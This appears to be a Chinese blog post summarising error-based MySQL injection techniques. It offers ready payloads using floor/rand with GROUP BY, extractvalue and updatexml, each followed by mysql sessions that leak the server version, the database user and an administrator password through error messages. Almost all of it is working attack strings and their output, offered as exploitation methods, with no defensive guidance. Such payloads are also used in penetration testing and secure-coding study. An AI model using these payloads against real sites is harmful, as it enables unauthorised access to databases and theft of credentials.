mysql 注入报错利用方法总结
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:
首先进行正常查询:
mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
+—-+——-+———+
| 1 | test | do it |
+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
error 1062 (23000): duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’
可以看到成功爆出了mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:
method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
error 1062 (23000): duplicate entry ‘admin8881’ for key ‘group_key’
method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
error 1062 (23000): duplicate entry ‘admin8881’ for key ‘group_key’
2、extractvalue
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
error 1105 (hy000): xpath syntax error: ‘\admin888’
3、updatexml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))error 1105 (hy000): xpath syntax error: ‘:root@localhost’
推荐阅读
-
解说mysql之binlog日志以及利用binlog日志恢复数据的方法
-
android使用mysql的方法总结
-
MySQL注入绕开过滤的技巧总结
-
Vue2.x中利用@font-size引入字体图标报错的解决方法
-
mysql执行sql文件报错Error: Unknown storage engine‘InnoDB’的解决方法
-
MySQL利用AES_ENCRYPT()与AES_DECRYPT()加解密的正确方法示例
-
PHP+mysql防止SQL注入的方法小结
-
利用ssh tunnel链接mysql服务器的方法
-
Pyinstaller打包.py生成.exe的方法和报错总结
-
mysql报错1033 Incorrect information in file: ‘xxx.frm’问题的解决方法